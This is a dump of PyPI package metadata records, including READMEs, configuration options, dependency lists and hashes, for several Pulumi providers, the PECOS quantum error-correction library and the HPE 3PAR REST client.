- `splunk:insecureSkipVerify` -(Optional) Insecure skip verification flag (Defaults to `true`)
It can also be sourced from the `SPLUNK_INSECURE_SKIP_VERIFY` environment variable.
- `splunk:timeout` - (Optional) Timeout when making calls to Splunk server. (Defaults to `60 seconds`)
It can also be sourced from the `SPLUNK_TIMEOUT` environment variable.
## Reference
For further information, please visit [the Splunk provider docs](https://www.pulumi.com/docs/intro/cloud-providers/splunk)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/splunk).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, splunk | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.0.0a1",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-splunk"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:47:44.424997 | pulumi_splunk-1.3.0a1771569595.tar.gz | 158,683 | 32/10/ca2752addb18e9d24a5bf8b1edff6f7ae32aec4c84d494dd0d894815cccc/pulumi_splunk-1.3.0a1771569595.tar.gz | source | sdist | null | false | 7214a6b8c590288eddc4b7d9f9233911 | 3cf815f872cab5af350047e7386177778efc7f662bab196d5f392c8a25383a67 | 3210ca2752addb18e9d24a5bf8b1edff6f7ae32aec4c84d494dd0d894815cccc | null | [] | 209 |
2.4 | pulumi-tailscale | 1.0.0a1771569675 | A Pulumi package for creating and managing Tailscale cloud resources. | [](https://github.com/pulumi/pulumi-tailscale/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/tailscale)
[](https://pypi.org/project/pulumi-tailscale)
[](https://badge.fury.io/nu/pulumi.tailscale)
[](https://pkg.go.dev/github.com/pulumi/pulumi-tailscale/sdk)
[](https://github.com/pulumi/pulumi-tailscale/blob/master/LICENSE)
# Tailscale Resource Provider
The Tailscale Resource Provider lets you manage [Tailscale](https://tailscale.com/) resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/tailscale
or `yarn`:
$ yarn add @pulumi/tailscale
### Python
To use from Python, install using `pip`:
$ pip install pulumi_tailscale
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-tailscale/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Tailscale
## Configuration
The following configuration points are available:
- `tailscale:apiKey` - (Required) API key to authenticate with the Tailscale API. It must be provided, but it can also be sourced
from the `TAILSCALE_API_KEY` environment variable.
- `tailscale:tailnet` - (Required) Tailscale tailnet to manage resources for. It must be provided, but it can also be
sourced from the `TAILSCALE_TAILNET` variable. A tailnet is the name of your Tailscale network. You can find it in
the top left corner of the Admin Panel beside the Tailscale logo.
- `tailscale:oauthClientId` - The OAuth application's ID when using OAuth client credentials. Can be set via the OAUTH_CLIENT_ID environment variable. Both 'oauthClientId' and 'oauthClientSecret' must be set. Conflicts with 'apiKey'.
- `oauthClientSecret` - The OAuth application's secret when using OAuth client credentials. Can be set via the OAUTH_CLIENT_SECRET environment variable. Both 'oauthClientId' and 'oauthClientSecret' must be set. Conflicts with 'apiKey'.
- `scopes` - The OAuth 2.0 scopes to request when for the access token generated using the supplied OAuth client credentials. See https://tailscale.com/kb/1215/oauth-clients/#scopes for available scopes. Only valid when both 'oauthClientId' and 'oauthClientSecret' are set.
## Reference
For further information, please visit [the Tailscale provider docs](https://www.pulumi.com/registry/packages/tailscale)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/registry/packages/tailscale/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, tailscale | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-tailscale"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:47:40.009361 | pulumi_tailscale-1.0.0a1771569675.tar.gz | 48,008 | 26/40/d61410e50ea85987ad7862ba8d500a0750c51060eecb6f73b2330f9fe0a8/pulumi_tailscale-1.0.0a1771569675.tar.gz | source | sdist | null | false | 8dc5228f7d78f01da23f7bb196b241fe | f2ea3b920a71db93202eccda6e3e7fe655e497cdf0e1b6364937c04a1662d497 | 2640d61410e50ea85987ad7862ba8d500a0750c51060eecb6f73b2330f9fe0a8 | null | [] | 212 |
2.4 | pulumi-sdwan | 0.7.0a1771569482 | A Pulumi package for managing resources on Cisco Catalyst SD-WAN. | # SDWAN Resource Provider
A Pulumi package for resources to interact with a Cisco Catalyst SD-WAN environment. It communicates with the SD-WAN Manager via the REST API.
## Installing
This package is available for several languages/platforms:
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/sdwan
```
or `yarn`:
```bash
yarn add @pulumi/sdwan
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_sdwan
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-sdwan/sdk/go/...
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Sdwan
```
## Reference
For detailed reference documentation, please visit [the Pulumi registry](https://www.pulumi.com/registry/packages/sdwan/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, sdwan, category/network | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.com",
"Repository, https://github.com/pulumi/pulumi-sdwan"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:47:27.409878 | pulumi_sdwan-0.7.0a1771569482.tar.gz | 2,004,248 | c8/6e/fc420242874a9e7cd3d137d86e76e62ec4b4b039c65905485ba083fc6805/pulumi_sdwan-0.7.0a1771569482.tar.gz | source | sdist | null | false | 9d629148a5172dec3dc5857fb0a0356c | b82f829a17c85e2e5f09213c0d85ea5f46185bbd7f8d135a1949cd0887a13154 | c86efc420242874a9e7cd3d137d86e76e62ec4b4b039c65905485ba083fc6805 | null | [] | 202 |
2.4 | quantum-pecos | 0.8.0.dev3 | PECOS is a library for the evaluation, study, and design of quantum error correction protocols. | # 
[](https://badge.fury.io/py/quantum-pecos)
[](https://quantum-pecos.readthedocs.io/en/latest/?badge=latest)
[](https://img.shields.io/badge/python-3.9%2C%203.10%2C%203.11-blue.svg)
[](https://www.quantinuum.com/)
**Performance Estimator of Codes On Surfaces (PECOS)** is a library/framework dedicated to the study, development, and
evaluation of quantum error-correction protocols. It also offers tools for the study and evaluation of hybrid
quantum/classical compute execution models.
Initially conceived and developed in 2014 to verify lattice-surgery procedures presented in
[arXiv:1407.5103](https://arxiv.org/abs/1407.5103) and released publicly in 2018, PECOS filled the gap in
the QEC/QC tools available at that time. Over the years, it has grown into a framework for studying general QECCs and
hybrid computation.
## Features
- Quantum Error-Correction Tools: Advanced tools for studying quantum error-correction protocols and error models.
- Hybrid Quantum/Classical Execution: Evaluate advanced hybrid compute models, including support for classical compute,
calls to Wasm VMs, conditional branching, and more.
- Fast Simulation: Leverages a fast stabilizer simulation algorithm.
- Multi-language extensions: Core functionalities implemented via Rust for performance and safety. Additional add-ons
and extension support in C/C++ via Cython.
- LLVM IR Support: Execute LLVM Intermediate Representation programs for hybrid quantum/classical computing. LLVM support is optional - PECOS can be built without LLVM by using `--no-default-features` when building the Rust crates. When LLVM is enabled (default), requires LLVM version 14.
## Getting Started
Explore the capabilities of PECOS by delving into the [documentation](https://quantum-pecos.readthedocs.io).
## Repository Structure
PECOS now consists of multiple interconnected components:
- `/python/`: Contains Python packages
- `/python/quantum-pecos/`: Main Python package (imports as `pecos`)
- `/python/pecos-rslib/`: Python package with Rust extensions that utilize the `pecos` crate
- `/crates/`: Contains Rust crates
- `/crates/pecos/`: Main Rust crate that collects the functionality of the other crates into one library
- `/crates/pecos-core/`: Core Rust functionalities
- `/crates/pecos-qsims/`: A collection of quantum simulators
- `/crates/pecos-qec/`: Rust code for analyzing and exploring quantum error correction (QEC)
- `/crates/pecos-qasm/`: Implementation of QASM parsing and execution
- `/crates/pecos-llvm-runtime/`: Implementation of LLVM IR execution for hybrid quantum-classical programs
- `/crates/pecos-engines/`: Quantum and classical engines for simulations
- `/crates/pecos/`: Main PECOS library (includes CLI with `cli` feature)
- `/crates/pecos-build/`: Developer tools CLI (LLVM setup, dependency management)
- `/crates/pecos-python/`: Rust code for Python extensions
- `/crates/benchmarks/`: A collection of benchmarks to test the performance of the crates
- `/julia/`: Contains Julia packages (experimental)
- `/julia/PECOS.jl/`: Main Julia package
- `/julia/pecos-julia-ffi/`: Rust FFI library for Julia bindings
### Quantum Error Correction Decoders
PECOS includes LDPC (Low-Density Parity-Check) quantum error correction decoders as optional components. See [DECODERS.md](DECODERS.md) for detailed information about:
- LDPC decoder algorithms and variants
- How to build and use decoders
- Performance considerations
- Architecture and development guide
You may find most of these crates in crates.io if you wish to utilize only a part of PECOS, e.g., the simulators.
## Versioning
We follow semantic versioning principles. However, before version 1.0.0, the MAJOR.MINOR.BUG format sees the roles
of MAJOR and MINOR shifted down a step. This means potential breaking changes might occur between MINOR increments, such
as moving from versions 0.1.0 to 0.2.0.
All Python packages and all Rust crates will have the same version amongst their
respective languages; however, Python and Rust versioning will differ.
## Latest Development
Stay updated with the latest developments on the
[PECOS Development branch](https://quantum-pecos.readthedocs.io/en/development/).
## Installation
### Python Package
To install the main Python package for general usage:
```sh
pip install quantum-pecos
```
This will install both `quantum-pecos` and its dependency `pecos-rslib`.
For optional dependencies:
```sh
pip install quantum-pecos[all]
```
**NOTE:** The `quantum-pecos` package is imported like: `import pecos` and not `import quantum_pecos`.
**NOTE:** To install pre-releases (the latest development code) from pypi you may have to specify the version you are
interested like so (e.g., for version `0.6.0.dev5`):
```sh
pip install quantum-pecos==0.6.0.dev5
```
**NOTE:** Certain simulators have special requirements and are not installed by the command above. Installation instructions for
these are provided [here](#simulators-with-special-requirements).
### Rust Crates
To use PECOS in your Rust project, add the following to your `Cargo.toml`:
```toml
[dependencies]
pecos = "0.x.x" # Replace with the latest version
```
#### Optional Dependencies
- **LLVM version 14**: Required for LLVM IR execution support (optional)
PECOS provides an automated installer or you can install manually:
```sh
# Quick setup with automated installer (recommended):
cargo run -p pecos --features cli -- llvm install
cargo build
```
The installer automatically configures PECOS after installation.
For detailed LLVM installation instructions for all platforms (macOS, Linux, Windows), see the [**Getting Started Guide**](docs/user-guide/getting-started.md#llvm-for-qis-support).
For full development environment setup, see the [**Development Setup Guide**](docs/development/DEVELOPMENT.md).
**Building without LLVM:** If you don't need LLVM IR support:
```sh
cargo build --no-default-features
```
### Julia Package (Experimental)
PECOS also provides experimental Julia bindings. To use the Julia package from the development branch:
```julia
using Pkg
Pkg.add(url="https://github.com/PECOS-packages/PECOS#dev", subdir="julia/PECOS.jl")
```
Then you can use it:
```julia
using PECOS
println(pecos_version()) # Prints PECOS version
```
**Note**: The Julia package requires the Rust FFI library to be built. Currently, you need to build it locally:
1. Clone the repository
2. Build the FFI library: `cd julia/pecos-julia-ffi && cargo build --release`
3. Add the package locally: `Pkg.develop(path="julia/PECOS.jl")`
## Development Setup
If you are interested in editing or developing the code in this project, see this
[development documentation](docs/development/DEVELOPMENT.md) to get started.
## Simulators with special requirements
Certain simulators from `pecos.simulators` require external packages that are not installed by `pip install .[all]`.
### GPU-Accelerated Simulators (CuStateVec and MPS)
- **`CuStateVec`** and **`MPS`** require:
- Linux machine with NVIDIA GPU (Compute Capability 7.0+)
- CUDA Toolkit 13 or 12 (system-level installation)
- Python packages: `cupy-cuda13x`, `cuquantum-python-cu13`, `pytket-cutensornet`
**Installation:** See the comprehensive [CUDA Setup Guide](docs/user-guide/cuda-setup.md) for detailed step-by-step instructions.
**Quick install** (after installing CUDA Toolkit):
```bash
uv pip install quantum-pecos[cuda]
# For development with CUDA support:
make build-cuda # Build with CUDA
make devc # Full dev cycle (clean + build-cuda + test)
make devcl # Dev cycle + linting
```
**Note:** When using `uv` or `pip`, install CUDA Toolkit via system package manager (e.g., `sudo apt install cuda-toolkit-13`), then install Python packages. Conda environments may conflict with `uv`/`venv` workflows.
## Uninstall
To uninstall:
```sh
pip uninstall quantum-pecos
```
## Citing
For publications utilizing PECOS, kindly cite PECOS such as:
```bibtex
@misc{pecos,
author={Ciar\'{a}n Ryan-Anderson},
title={PECOS: Performance Estimator of Codes On Surfaces},
publisher = {GitHub},
journal = {GitHub repository},
howpublished={\url{https://github.com/PECOS-packages/PECOS}},
URL = {https://github.com/PECOS-packages/PECOS},
year={2018}
}
```
And/or the PhD thesis PECOS was first described in:
```bibtex
@phdthesis{crathesis,
author={Ciar\'{a}n Ryan-Anderson},
school = {University of New Mexico},
title={Quantum Algorithms, Architecture, and Error Correction},
journal={arXiv:1812.04735},
URL = {https://digitalrepository.unm.edu/phyc_etds/203},
year={2018}
}
```
You can also use the [Zenodo DOI](https://zenodo.org/records/13700104), which would result in a bibtex like:
```bibtex
@software{pecos_[year],
author = {Ciar\'{a}n Ryan-Anderson},
title = {PECOS-packages/PECOS: [version]]},
month = [month],
year = [year],
publisher = {Zenodo},
version = {[version]]},
doi = {10.5281/zenodo.13700104},
url = {https://doi.org/10.5281/zenodo.13700104}
}
```
## License
This project is licensed under the Apache-2.0 License - see the [LICENSE](./LICENSE) and [NOTICE](NOTICE) files for
details.
## Supported by
[.svg)](https://www.quantinuum.com/)
| text/markdown | The PECOS Developers | null | null | Ciaran Ryan-Anderson <ciaranra@gmail.com> | Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "{}" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright {yyyy} {name of copyright owner} Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | PECOS, QEC, quantum, simulation | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering :: Physics"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"guppylang>=0.21.6",
"hugr>=0.13.0",
"networkx>=2.1.0",
"pecos-rslib==0.8.0.dev3",
"phir>=0.3.3",
"selene-sim~=0.2.0",
"matplotlib>=2.2.0; extra == \"all\"",
"plotly~=5.9.0; extra == \"all\"",
"stim>=1.12.0; extra == \"all\"",
"cupy-cuda13x>=13.0.0; python_version >= \"3.11\" and extra == \"cuda\"",
"cuquantum-python-cu13>=25.3.0; python_version >= \"3.11\" and extra == \"cuda\"",
"pytket-cutensornet>=0.12.0; python_version >= \"3.11\" and extra == \"cuda\"",
"stim>=1.12.0; extra == \"stim\"",
"matplotlib>=2.2.0; extra == \"visualization\"",
"plotly~=5.9.0; extra == \"visualization\""
] | [] | [] | [] | [
"documentation, https://quantum-pecos.readthedocs.io",
"repository, https://github.com/PECOS-packages/PECOS"
] | twine/6.0.1 CPython/3.10.12 | 2026-02-20T06:47:26.342693 | quantum_pecos-0.8.0.dev3.tar.gz | 1,451,426 | 8f/4b/623e80c0254a648679adb42e22c08baa532834be5c894c84e5ce1d0e5625/quantum_pecos-0.8.0.dev3.tar.gz | source | sdist | null | false | 732f7248020b4246a211a524e0a05dbc | e7aef7a1b89bb668a6f36965e3311f99dcdcf884314417fa2c8654cb975f3c0e | 8f4b623e80c0254a648679adb42e22c08baa532834be5c894c84e5ce1d0e5625 | null | [] | 228 |
2.4 | pecos-rslib | 0.8.0.dev3 | Rust libary extensions for Python PECOS. | # pecos-rslib
`pecos-rslib` provides Rust extensions for the Python version of PECOS.
| text/markdown; charset=UTF-8; variant=GFM | The PECOS Developers | null | null | Ciaran Ryan-Anderson <ciaranra@gmail.com> | null | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Physics",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Rust"
] | [] | https://pecos.io | null | >=3.10 | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.0.1 CPython/3.10.12 | 2026-02-20T06:47:18.633556 | pecos_rslib-0.8.0.dev3-cp310-abi3-win_amd64.whl | 36,762,757 | 7e/95/a37bb863c3f694251406f7f112f281e646b54c7d02ecf5f0d9eeb09818a5/pecos_rslib-0.8.0.dev3-cp310-abi3-win_amd64.whl | cp310 | bdist_wheel | null | false | ea83ea4d7870b9b1dcd1f1462d5d4a78 | ca767d900dde9635aaa0796c6e4b07a938456b2dd29f5cbb967d6258c6a720dc | 7e95a37bb863c3f694251406f7f112f281e646b54c7d02ecf5f0d9eeb09818a5 | null | [] | 278 |
2.4 | python-3parclient | 4.3 | HPE Alletra MP, 9000, Primera and 3PAR REST Client | # HPE Alletra 9000 and HPE Primera and HPE 3PAR REST Client
This is a Client library that can talk to the HPE Alletra 9000 and Primera
and 3PAR Storage array. The HPE Alletra 9000 and Primera and 3PAR storage
array has a REST web service interface and a command line interface. This
client library implements a simple interface for talking with either
interface, as needed. The python Requests library is used to communicate
with the REST interface.
# Requirements
HPE 3PAR: 3.1.3 MU1 or later.
HPE Primera: 4.3.1 or later.
HPE Alletra 9000: 9.3.0 or later.
HPE 3PAR File Persona: 3.2.1 Build 46 or later.
# Capabilities
* Create Volume
* Delete Volume
* Get all Volumes
* Get a Volume
* Modify a Volume
* Copy a Volume
* Create a Volume Snapshot
* Create CPG
* Delete CPG
* Get all CPGs
* Get a CPG
* Get a CPG’s Available Space
* Create a VLUN
* Delete a VLUN
* Get all VLUNs
* Get a VLUN
* Create a Host
* Delete a Host
* Get all Hosts
* Get a Host
* Get VLUNs for a Host
* Find a Host
* Find a Host Set for a Host
* Get all Host Sets
* Get a Host Set
* Create a Host Set
* Delete a Host Set
* Modify a Host Set
* Get all Ports
* Get iSCSI Ports
* Get FC Ports
* Get IP Ports
* Set Volume Metadata
* Get Volume Metadata
* Get All Volume Metadata
* Find Volume Metadata
* Remove Volume Metadata
* Create a Volume Set
* Delete a Volume Set
* Modify a Volume Set
* Get a Volume Set
* Get all Volume Sets
* Find one Volume Set containing a specified Volume
* Find all Volume Sets containing a specified Volume
* Create a QOS Rule
* Modify a QOS Rule
* Delete a QOS Rule
* Set a QOS Rule
* Query a QOS Rule
* Query all QOS Rules
* Get a Task
* Get all Tasks
* Get a Patch
* Get all Patches
* Get WSAPI Version
* Get WSAPI Configuration Info
* Get Storage System Info
* Get Overall System Capacity
* Stop Online Physical Copy
* Query Online Physical Copy Status
* Stop Offline Physical Copy
* Resync Physical Copy
* Query Remote Copy Info
* Query a Remote Copy Group
* Query all Remote Copy Groups
* Create a Remote Copy Group
* Delete a Remote Copy Group
* Modify a Remote Copy Group
* Add a Volume to a Remote Copy Group
* Remove a Volume from a Remote Copy Group
* Start Remote Copy on a Remote Copy Group
* Stop Remote Copy on a Remote Copy Group
* Synchronize a Remote Copy Group
* Recover a Remote Copy Group from a Disaster
* Enable/Disable Config Mirroring on a Remote Copy Target
* Get Remote Copy Group Volumes
* Get Remote Copy Group Volume
* Admit Remote Copy Link
* Dismiss Remote Copy Link
* Start Remote Copy
* Remote Copy Service Exists Check
* Get Remote Copy Link
* Remote Copy Link Exists Check
* Admit Remote Copy Target
* Dismiss Remote Copy Target
* Target In Remote Copy Group Exists Check
* Remote Copy Group Status Check
* Remote Copy Group Status Started Check
* Remote Copy Group Status Stopped Check
* Create Schedule
* Delete Schedule
* Get Schedule
* Modify Schedule
* Suspend Schedule
* Resume Schedule
* Get Schedule Status
* Promote Virtual Copy
* Get a Flash Cache
* Create a Flash Cache
* Delete a Flash Cache
# File Persona Capabilities
* Get File Services Info
* Create a File Provisioning Group
* Grow a File Provisioning Group
* Get File Provisioning Group Info
* Modify a File Provisioning Group
* Remove a File Provisioning Group
* Create a Virtual File Server
* Get Virtual File Server Info
* Modify a Virtual File Server
* Remove a Virtual File Server
* Assign an IP Address to a Virtual File Server
* Get the Network Config of a Virtual File Server
* Modify the Network Config of a Virtual File Server
* Remove the Network Config of a Virtual File Server
* Create a File Services User Group
* Modify a File Services User Group
* Remove a File Services User Group
* Create a File Services User
* Modify a File Services User
* Remove a File Services User
* Create a File Store
* Get File Store Info
* Modify a File Store
* Remove a File Store
* Create a File Share
* Get File Share Info
* Modify a File Share
* Remove a File Share
* Create a File Store Snapshot
* Get File Store Snapshot Info
* Remove a File Store Snapshot
* Reclaim Space from Deleted File Store Snapshots
* Get File Store Snapshot Reclamation Info
* Stop or Pause a File Store Snapshot Reclamation Task
* Set File Services Quotas
* Get Files Services Quota Info
# Installation
To install from source:
```
$ sudo pip install .
```
To install from http://pypi.org:
```
$ sudo pip install python-3parclient
```
# Unit Tests
To run all unit tests:
```
$ tox -e py27
```
To run a specific test:
```
$ tox -e py27 -- test/file.py:class_name.test_method_name
```
To run all unit tests with code coverage:
```
$ tox -e cover
```
The output of the coverage tests will be placed into the `coverage` dir.
# Folders
* docs – contains the documentation
* hpe3parclient – the actual client.py library
* test – unit tests
* samples – some sample uses
# Documentation
To build the documentation:
```
$ tox -e docs
```
To view the built documentation point your browser to:
```
docs/html/index.html
```
# Running Simulators
The unit tests should automatically start/stop the simulators. To start
them manually use the following commands. To stop them, use ‘kill’.
Starting them manually before running unit tests also allows you to watch
the debug output.
* WSAPI:
```
$ python test/HPE3ParMockServer_flask.py -port 5001 -user <USERNAME> -password <PASSWORD> -debug
```
# Building wheel dist
This client now supports building via the new python WHEELS standard.
Take a look at http://pythonwheels.com
* building:
```
$ python setup.py bdist_wheel
```
* building and uploading:
```
$ python setup.py sdist bdist_wheel upload
```
| text/markdown | null | Raghavendra Tilay <raghavendra-uddhav.tilay@hpe.com> | null | null | null | null | [
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.8",
"Topic :: Internet :: WWW/HTTP"
] | [] | null | null | null | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.1.0 CPython/3.12.3 | 2026-02-20T06:47:11.705259 | python_3parclient-4.3.tar.gz | 68,891 | 15/b7/748ad7ba136b98afa3b8e55ceb22e00053d390832bf6bd08fb50e5933c98/python_3parclient-4.3.tar.gz | source | sdist | null | false | c94d772cf49621ae7823b8effd595ce5 | 3d1559324c4c8d4599be5c8cd0023b852e972a67cbfe09a4be6e4a5de8cb9868 | 15b7748ad7ba136b98afa3b8e55ceb22e00053d390832bf6bd08fb50e5933c98 | null | [
"LICENSE"
] | 2,081 |
2.4 | pulumi-slack | 1.0.0a1771569414 | A Pulumi package for managing Slack workspaces. | # Slack Resource Provider
The Slack Provider enables you to manage Slack resources via Pulumi.
## Installing
This package is available for several languages/platforms:
